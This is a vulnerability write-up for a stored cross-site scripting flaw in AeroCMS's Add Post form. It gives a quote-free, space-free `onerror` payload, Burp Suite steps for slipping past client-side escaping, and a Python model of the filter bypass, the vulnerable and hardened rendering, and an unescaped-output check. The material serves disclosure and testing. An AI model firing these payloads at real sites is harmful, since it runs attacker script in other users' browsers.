CVE-2022-46058: CVE/add_post_post_content.md at master · rdyx0/CVE
AeroCMS v0.0.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability via add_post.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Comments text field. Note that the reproduction steps below inject the payload through the Post Content field of the Add Posts form, and the payload fires when the saved post is viewed.
add_post_post_content
Steps to Reproduce
- Log in to the admin panel -> Posts -> Add Posts -> Post Content -> inject the payload `<img/src/onerror=prompt(1)>` -> the XSS triggers once the Publish Post button is clicked and the post is rendered. The payload uses `/` instead of spaces and contains no quotes, so it survives filters that only strip `<script>` tags, quotes or whitespace.
Exploit
- If the editor escapes the payload in the browser, submit the request through Burp Suite instead: intercept the Publish Post request and place the raw payload in the post content field before forwarding it.
- Click View Post for the new submission; the stored payload executes when the post body is rendered unescaped.
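The following is an added example, not code from the rdyx0/CVE repository or from AeroCMS. It models the finding offline in Python: a hypothetical blocklist filter (standing in for the escaping the report says must be bypassed via Burp) that the `<img/src/onerror=prompt(1)>` payload survives, the vulnerable render versus the same sink with output encoding, the URL-encoded body a tester would replay in Burp (the `title`/`post_content`/`publish` field names are assumptions, not AeroCMS's real parameters), and the check a tester runs on the View Post response to confirm the payload is reflected unescaped.

```python
"""Stored XSS model for the AeroCMS add_post.php report above.

Added example only: the filter, render functions and form field names
are assumptions that stand in for the CMS code, which is not reproduced.
"""
import html
import re
from urllib.parse import urlencode

# Payload from the report: no spaces, no quotes, attribute separated by '/'.
PAYLOAD = "<img/src/onerror=prompt(1)>"

# Any tag carrying an on* event handler attribute in raw (unencoded) HTML.
EVENT_HANDLER_TAG = re.compile(r"<\w+[^>]*?\bon\w+\s*=", re.IGNORECASE)


def naive_filter(value: str) -> str:
    """Hypothetical blocklist filter (assumed, not AeroCMS's code).

    Strips <script> tags, quotes and 'javascript:'. It misses the report's
    payload because that payload needs none of those characters.
    """
    value = re.sub(r"(?i)</?script[^>]*>", "", value)
    value = re.sub(r"(?i)javascript:", "", value)
    return value.replace('"', "").replace("'", "")


def render_vulnerable(post_content: str) -> str:
    """Models the vulnerable sink: post body concatenated into the page."""
    return f"<div class='post-body'>{post_content}</div>"


def render_hardened(post_content: str) -> str:
    """Same sink with HTML output encoding applied at render time."""
    return f"<div class='post-body'>{html.escape(post_content, quote=True)}</div>"


def build_publish_body(title: str, post_content: str) -> str:
    """URL-encoded form body a tester would paste into the intercepted
    Publish Post request in Burp. Field names are assumptions."""
    return urlencode({"title": title, "post_content": post_content,
                      "publish": "Publish Post"})


def reflected_unescaped(page: str, payload: str) -> bool:
    """Tester's check on the View Post response: the payload appears
    byte-for-byte (not entity-encoded) and a raw on* handler tag exists."""
    return payload in page and EVENT_HANDLER_TAG.search(page) is not None


def demo() -> dict:
    """Run the whole chain and report each step's outcome."""
    filtered = naive_filter(PAYLOAD)
    return {
        "survives_naive_filter": filtered == PAYLOAD,
        "burp_body": build_publish_body("test", filtered),
        "vulnerable_page_exploitable": reflected_unescaped(
            render_vulnerable(filtered), PAYLOAD),
        "hardened_page_exploitable": reflected_unescaped(
            render_hardened(filtered), PAYLOAD),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The `reflected_unescaped` check is what turns "I clicked View Post and saw a prompt" into a repeatable assertion: run it over the raw HTTP response rather than relying on the browser, since a browser extension or CSP can suppress the visible prompt while the unescaped tag is still present in the HTML.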